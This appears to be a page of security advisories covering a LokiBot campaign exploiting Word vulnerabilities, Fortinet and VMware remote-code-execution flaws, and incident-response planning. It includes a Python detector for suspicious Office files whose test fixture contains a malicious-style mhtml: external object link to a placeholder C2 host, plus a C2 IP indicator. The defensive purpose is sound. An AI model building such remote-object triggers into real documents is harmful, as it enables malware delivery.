LokiBot Malware Exploits Microsoft Word Vulnerabilities for Widespread Distribution


OVERVIEW
Researchers recently uncovered a LokiBot info-stealer campaign exploiting well-known Microsoft Office related vulnerabilities.

First observed in May 2023, the campaign exploited two remote code execution vulnerabilities (CVE-2021-40444 and CVE-2022-30190) by embedding malicious macros in Microsoft Office documents, specifically Word documents. Infected files were named “document.xml.rels” and contained an MHTML link. Executing this file triggered the deployment of exploits for the second vulnerability.

More recent versions of this attack embed a VBA script within the Word document. The VBA script generates an INF file that calls a DLL file, which in turn downloads a second-stage code injector from a specific URL. The code injector employs evasion techniques and executes the LokiBot malware in the final stage.

The researchers’ examination of the command-and-control (C2) traffic showed that the LokiBot version (March ’23) deployed in these campaigns uses an MD5 hash as a mutex to prevent multiple instances of the malware from running concurrently.
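The delivery traits described above (an MHTML link inside word/_rels/document.xml.rels and an embedded VBA project) can be checked for at the mail gateway or on an endpoint before a document is opened. The scanner below is an added example, not code from the advisory or from the researchers it cites; the in-memory sample documents, the c2.invalid host and example.com are constructed placeholders.

```python
# Added example, not code from the advisory: flag the two delivery traits the
# overview describes (an MHTML link in word/_rels/document.xml.rels and an
# embedded VBA project) in a .docx supplied as bytes. Sample inputs are built
# in memory below and are constructed test data, not real malicious documents.
import io
import zipfile
import xml.etree.ElementTree as ET  # prefer defusedxml when parsing untrusted XML

RELS_PATH = "word/_rels/document.xml.rels"
VBA_PART = "word/vbaProject.bin"
MAX_PART_SIZE = 1 << 20  # refuse rels parts over 1 MiB (zip-bomb guard)

def scan_docx(data: bytes) -> dict:
    """Return findings for an OOXML Word document given as raw bytes."""
    f = {"external_targets": [], "mhtml_targets": [], "has_vba": False, "error": None}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        f["error"] = "not a zip/OOXML container"
        return f
    names = set(zf.namelist())
    f["has_vba"] = VBA_PART in names  # macro project present
    if RELS_PATH not in names:
        return f
    if zf.getinfo(RELS_PATH).file_size > MAX_PART_SIZE:
        f["error"] = "relationship part too large"
        return f
    for rel in ET.fromstring(zf.read(RELS_PATH)).iter():
        if rel.tag.rsplit("}", 1)[-1] != "Relationship":
            continue  # skip the root and any non-Relationship element
        target = rel.get("Target", "")
        if rel.get("TargetMode", "").lower() == "external":
            f["external_targets"].append(target)
        if target.strip().lower().startswith("mhtml:"):  # the document.xml.rels MHTML stage
            f["mhtml_targets"].append(target)
    return f

def verdict(f: dict) -> str:
    """Collapse findings into a triage label for a mail-filter or EDR pipeline."""
    if f["error"]:
        return "unreadable"
    if f["mhtml_targets"]:
        return "suspicious"
    if f["has_vba"]:
        return "review"  # macros are common in business documents: review, do not auto-block
    return "clean"

# Constructed sample rels parts; c2.invalid and example.com are placeholders.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ODR = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
BENIGN_RELS = (f'<Relationships xmlns="{REL_NS}">'
               f'<Relationship Id="rId1" Type="{ODR}styles" Target="styles.xml"/>'
               f'<Relationship Id="rId2" Type="{ODR}hyperlink" Target="https://example.com/" '
               f'TargetMode="External"/></Relationships>')
MHTML_RELS = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" Type="{ODR}oleObject" '
              f'Target="mhtml:http://c2.invalid/doc.html" TargetMode="External"/></Relationships>')

def build_sample_docx(rels_xml: str, with_vba: bool) -> bytes:
    """Build a minimal in-memory .docx carrying the given rels part (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(RELS_PATH, rels_xml)
        if with_vba:
            zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0")  # OLE magic only, no macro code
    return buf.getvalue()
```

A plain external hyperlink alone is reported but left at "clean", since such relationships are routine; only the mhtml: scheme or a macro project raises the label.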

INDICATORS OF COMPROMISE

Command and Control:

  • 95[.]164[.]23[.]2

Related Files:


RECOMMENDATIONS
  • Patch Management: Patch and update all instances of Microsoft Office.
  • Training and Awareness: Educate users about the risks of opening suspicious email attachments or clicking untrusted links.
  • Cybersecurity Controls (Endpoints): Deploy, manage and monitor advanced endpoint protection that includes anti-malware and intrusion detection and prevention.
  • Cybersecurity Controls (Network): Deploy 24×7 network traffic monitoring to identify and block suspicious communication with command-and-control (C2) servers.
  • Email Filtering: Enable all available capabilities to scrutinize incoming email, blocking the malicious attachments and links commonly used for malware distribution.
  • Multi-Factor Authentication (MFA): Enforce MFA for all sensitive accounts and systems as an additional layer of protection against unauthorized access; this helps mitigate the impact of credentials stolen by LokiBot.


What is an Incident Response Plan and Why is it Important?

An incident response plan is a document that outlines the procedures, steps, and rules an organization must follow in the case of a virtual threat (such as a data breach) or a physical threat (such as a natural disaster or power shortage). Implementing a cyber breach incident response plan within the organization helps reduce the impact of the damage caused by a threat. NIST (the National Institute of Standards and Technology) describes four key elements of a breach response plan: Preparation (so that an organization can plan accordingly and respond to events), Detection and Analysis (analyzing the severity of the incident when it occurs), Containment and Eradication (making sure the damage caused doesn’t worsen), and Post-Incident Recovery (all parties involved examine the lessons learned to ensure greater security in the future). The main intentions of the incident response plan are to minimize the damage done, identify the stakeholders of the situation, improve recovery time, and improve overall company security. Another benefit of a cyber incident response plan is that it helps identify and protect against potential vulnerabilities.

Team

Apart from the plan itself, the team members who create the incident response plan are also crucial to its success. This team includes the following roles:

  • Team Leader/Executive Sponsor: budgets the plan and handles communication with the rest of the executives
  • Incident Manager: whoever is in charge during the breach
  • Lead Investigator: the analyst or responder for the incident
  • Communications/Public Relations: maintains PR and communications
  • Legal: a legal representative is needed to approve messaging and advise on applicable laws
  • Human Resources Representative: deals with employee-related issues

SOAR

Once the IR process is created, the technology needed to automate remediation (containment, eradication, and recovery) needs to be considered. SOAR stands for Security Orchestration, Automation and Response. SOAR software collects data from all of the organization’s security products and the threats they report so that it can respond to events with minimal human assistance. This allows an organization to focus its security efforts on three primary areas: threat and vulnerability management, security operations management, and incident response.

Common Mistakes

It’s important to specify the method of communication, so that the team can report issues through one primary platform instead of many, which tends to cause confusion. This is also important in the case of a DDoS (Distributed Denial of Service) attack, in which a server is flooded with traffic that blocks the network. It’s also important to make sure that communications are pre-written and approved in case of an attack. Finally, it’s important that the team goes through tabletop exercises to make sure everyone knows what needs to be done.

Table Top Exercises

Tabletop exercises are activities or simulations intended to give an organization’s members proper practice so that they achieve the best results during an actual threat. There are two main forms of tabletop exercise: operational and discussion-based. The main benefit of tabletop exercises is that they create consistency among the team, identify any faults in the procedure, and help recognize resources that could be utilized in the event of a threat or attack. Common cyber incident response scenarios for tabletop exercises include unauthorized access, device or network compromise, and data breaches.

Tabletop exercises are carried out to mimic a real scenario, so when conducting an exercise with the team it’s important to develop the practice scenario thoroughly. It is also advised to have a timekeeper during these exercises. Unpredicted situations that arise should be noted and discussed in order to work out the best solutions for them. Ideally, these exercises last 1-4 hours and tend to be low cost and low stakes.

How Does an Incident Response Plan Benefit a Company?

One of the biggest benefits of an IR plan is that it reduces downtime (periods of limited production or technical halts), because it gives detailed guidance on what the company expects its employees to do in almost any scenario. Another key benefit is on the PR side: an IR plan is crucial to maintaining public trust, because a company that can recover from an attack demonstrates that it is serious about protecting data. The third benefit is that an IR plan helps a company stay compliant, reducing the chance of an unforeseen lawsuit from unhappy clients. It also lets a company be as prepared as possible when threats do strike, since the best course of action has already been worked out and employees have already been trained through their tabletop exercises. Finally, an incident response plan helps minimize the damage done by an attack; without a proper cyber breach incident response plan in place, financial, legal, and operational damage can worsen over time.

A Vulnerability in FortiOS and FortiProxy Could Allow for Remote Code Execution

A Vulnerability in FortiOS and FortiProxy Could Allow for Remote Code Execution

DOWNLOAD PDF

OVERVIEW
A vulnerability has been discovered in Fortinet FortiOS and FortiProxy which could allow for remote code execution. FortiOS is Fortinet’s proprietary operating system, used across multiple product lines. FortiProxy is a secure web gateway that protects users against internet-borne attacks and provides protection and visibility against unauthorized access and threats to the network. Successful exploitation of this vulnerability could allow for remote code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts configured with fewer user rights on the system could be less impacted than those that operate with administrative user rights.

THREAT INTELLIGENCE
There are currently no reports of this vulnerability being exploited in the wild.

SYSTEMS AFFECTED

  • FortiOS version 7.2.0 through 7.2.3
  • FortiOS version 7.0.0 through 7.0.10
  • FortiProxy version 7.2.0 through 7.2.2
  • FortiProxy version 7.0.0 through 7.0.9

RISK

Government:

  • Large and medium government entities: High
  • Small government entities: Medium

Businesses:

  • Large and medium business entities: High
  • Small business entities: Medium


Homes: Low

TECHNICAL SUMMARY
A vulnerability has been discovered in Fortinet FortiOS and FortiProxy, which could allow for remote code execution. Details of the vulnerability are as follows:

Tactic: Initial Access (TA0001):

Technique: Exploit Public-Facing Application (T1190):

  • CVE-2023-33308 – A stack-based overflow vulnerability in FortiOS & FortiProxy may allow a remote attacker to execute arbitrary code or command via crafted packets reaching proxy policies or firewall policies with proxy mode alongside SSL deep packet inspection.

Successful exploitation of this vulnerability could allow for remote code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts configured with fewer user rights on the system could be less impacted than those that operate with administrative user rights.

RECOMMENDATIONS
We recommend the following actions be taken:

  • Apply appropriate updates provided by Fortinet to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
    • Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 7.2: Establish and Maintain a Remediation Process: Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.
    • Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
    • Safeguard 7.6: Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets: Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.
    • Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
    • Safeguard 12.1: Ensure Network Infrastructure is Up-to-Date: Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.
    • Safeguard 18.1: Establish and Maintain a Penetration Testing Program: Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.
    • Safeguard 18.2: Perform Periodic External Penetration Tests: Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.
    • Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
  • Utilize vulnerability scanning to find potentially exploitable software vulnerabilities to remediate them. (M1016: Vulnerability Scanning)
    • Safeguard 16.13: Conduct Application Penetration Testing: Conduct application penetration testing. For critical applications, authenticated penetration testing is better suited to finding business logic vulnerabilities than code scanning and automated security testing. Penetration testing relies on the skill of the tester to manually manipulate an application as an authenticated and unauthenticated user.
  • Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
    • Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
    • Safeguard 5.4: Restrict Administrator Privileges to Dedicated Administrator Accounts: Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.
    • Safeguard 5.5: Establish and Maintain an Inventory of Service Accounts: Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose. Perform service account reviews to validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.
    • Safeguard 6.8: Define and Maintain Role-Based Access Control: Define and maintain role-based access control, through determining and documenting the access rights necessary for each role within the enterprise to successfully carry out its assigned duties. Perform access control reviews of enterprise assets to validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.


Multiple Vulnerabilities in VMware Products Could Allow for Arbitrary Code Execution

Multiple Vulnerabilities in VMware Products Could Allow for Arbitrary Code Execution

DOWNLOAD PDF 

OVERVIEW
Multiple vulnerabilities have been discovered in VMware vCenter Server and Cloud Foundation, the most severe of which could allow for arbitrary code execution. VMware vCenter Server is the centralized management utility for VMware. VMware Cloud Foundation is a multi-cloud platform that provides a full-stack hyperconverged infrastructure (HCI) that is made for modernizing data centers and deploying modern container-based applications. Successful exploitation of these vulnerabilities could allow for arbitrary code execution in the context of the administrator account. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

THREAT INTELLIGENCE
There are no reports of these vulnerabilities being exploited in the wild.

SYSTEMS AFFECTED

  • VMware – VMware vCenter Server (vCenter Server) versions prior to 8.0 U1b
  • VMware – VMware vCenter Server (vCenter Server) versions prior to 7.0 U3m
  • VMware – VMware Cloud Foundation (vCenter Server) versions prior to 7.0 U3m, 8.0 U1b

RISK

Government:

  • Large and medium government entities: High
  • Small government entities: Medium

Businesses:

  • Large and medium business entities: High
  • Small business entities: Medium

Homes: Low

TECHNICAL SUMMARY
Multiple vulnerabilities have been discovered in VMware vCenter Server and Cloud Foundation, the most severe of which could allow for arbitrary code execution. Details of these vulnerabilities are as follows:

Tactic: Initial Access (TA0001):

Technique: Exploit Public-Facing Application (T1190):

  • CVE-2023-20892 – VMware vCenter Server heap-overflow vulnerability – The vCenter Server contains a heap overflow vulnerability due to the usage of uninitialized memory in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit this heap-overflow vulnerability to execute arbitrary code on the underlying operating system that hosts vCenter Server.
  • CVE-2023-20893 – VMware vCenter Server use-after-free vulnerability – The VMware vCenter Server contains a use-after-free vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit this issue to execute arbitrary code on the underlying operating system that hosts vCenter Server.

Details of the lower-severity vulnerabilities are as follows:

  • CVE-2023-20894 – The VMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bound write by sending a specially crafted packet leading to memory corruption.
  • CVE-2023-20895 – The VMware vCenter Server contains a memory corruption vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger a memory corruption vulnerability which may bypass authentication.
  • CVE-2023-20896 – The VMware vCenter Server contains an out-of-bounds read vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds read by sending a specially crafted packet leading to denial-of-service of certain services (vmcad, vmdird, and vmaf

Successful exploitation of these vulnerabilities could allow for arbitrary code execution in the context of the administrator account. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

RECOMMENDATIONS
We recommend the following actions be taken:

  • Apply appropriate updates provided by VMware to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
    • Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
    • Safeguard 7.6: Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets: Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.
    • Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
  • Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
    • Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
    • Safeguard 5.4: Restrict Administrator Privileges to Dedicated Administrator Accounts: Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.
  • Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. (M1035: Limit Access to Resource Over Network)
  • Use intrusion detection signatures to block traffic at network boundaries. (M1031: Network Intrusion Prevention)
    • Safeguard 13.3: Deploy a Network Intrusion Detection Solution: Deploy a network intrusion detection solution on enterprise assets, where appropriate. Example implementations include the use of a Network Intrusion Detection System (NIDS) or equivalent cloud service provider (CSP) service.
    • Safeguard 13.8: Deploy a Network Intrusion Prevention Solution: Deploy a network intrusion prevention solution, where appropriate. Example implementations include the use of a Network Intrusion Prevention System (NIPS) or equivalent CSP service.
  • Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. (M1050: Exploit Protection)
    • Safeguard 13.10: Perform Application Layer Filtering: Perform application layer filtering. Example implementations include a filtering proxy, application layer firewall, or gateway.
